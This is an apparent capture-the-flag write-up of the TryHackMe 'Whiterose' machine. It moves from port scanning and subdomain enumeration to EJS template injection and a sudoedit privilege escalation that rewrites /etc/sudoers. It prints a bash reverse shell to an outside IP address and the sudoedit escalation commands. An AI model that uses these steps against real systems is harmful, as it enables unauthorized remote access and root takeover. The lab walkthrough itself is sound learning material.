Whiterose (THM)
Yet another Mr. Robot themed challenge.
Intro.
Welcome eveyone once again we have another Mr.Robot theme machin by try hack me so excited.
Enumeration.
Port Scan.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCddbej9ZSf75uuDvLDeym5AYM+loP/3W862HTWjmksh0UuiuIz8UNTrf3ZpgtBej4y3E3EKvOmYFvJHZpFRV/hQBq1oZB3+XXVzb5RovazcnMgvFxI4y5nCQM8qTW09YvBOpzTyYmsKjVRJOfLR+F87g90vNdZ/u8uVl7IH0B6NmhGlCjPMVLRmhz7PuZih38t0WRWPruEY5qGliW0M3ngZXL6MmL1Jo146HtM8GASdt6yV9U3GLa3/OMFVjYgysqUQPrMwvUrQ8tIDnRAH1rsKBxDFotvcfW6mJ1OvojQf8PEw7iI/PNJZWGzkg+bm4/k+6PRjO2v/0V98DlU+gnn
| 256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNMBr/zXjVQItMqdVH12/sZ3rIt2XFsPWRCy4bXCE7InUVg8Q9SVFkOW2LAi1UStP4A4W8yA8hW+1wJaEFP9ffs=
| 256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIdJAkvDVqEAbac77yxYfkM0AU8puWxCyqCBJ9Pd9zCi
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).As usual we have an SSH, HTTP open ports let's see what we have in HTTP.
enumerate subdomains.
So when i first accessed the web it could not found the domain cyprusbank.thm. So i had to add it into the etc/hosts file. and i tried to use gobuster to enumerate the subdomains and i found this.
And we have a creds which has been given for access this admin panel. and as in the show Eliot uses her to gain access into the Cyprus National Bank.
accessing admin panel.
After we access the admin panel we going to find multple transactions in billions.
Accessing admin account.
So after few minutes playing around i found the chat.
The first thing intrest me in the page was the 'c' argument in the url so i play with it do we. and i found that it allow for chat history.
Using this "Gayle Bev" and password. Yeah i forgot we need admin access for the settings we can not access the settings as Olivia Cortez.
using the settings i was able to change the password for 'Tyrell Wellick' to 'password'. But this step was no good.
from here i was able to get the phone number for tyrell Wellic.
Web Shell.
So i think why would be there a setting where i can change the password but it does not work this does not make any sense right ?.
So i start play around and i found out this.
If we deleted the password value from the request it will give us this error indicating that the password is undefined and also tells us that it uses ejs.
searching a bit on exploit regarding ejs i found this.
which is a CVE effects some versions of ejs. using the payload from the write-up i was able to verify that this version is infected.
so i use a simple reverse shell in upload it to the server.
#!/bin/bash
sh -i >& /dev/tcp/10.11.96.110/9001 0>&1
changing the permission of the file.
Then we just run the send the request and do not forget to setup the listner.
Root Shell.
as for the root shell it was not that hard.
we can see we can use sudo edit to edit some config file let's see if we can take advantage of this.
this repo here shows a CVE which allow us to use vulnerable version of sudo edit to edit any file and therefor we can edit the sudores file to allow us to run any command as root.
export EDITOR="vi -- /etc/sudoers"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thmwe can use the repo or this two commands to get what we want.
after the edit the file should look like this using sudo -l again we can see that we can run anything as root.
conclusion.
this machine was so good since i love MR. Robot and we can learn a lesson is to update our packages as soon as possible. 😂
Last updated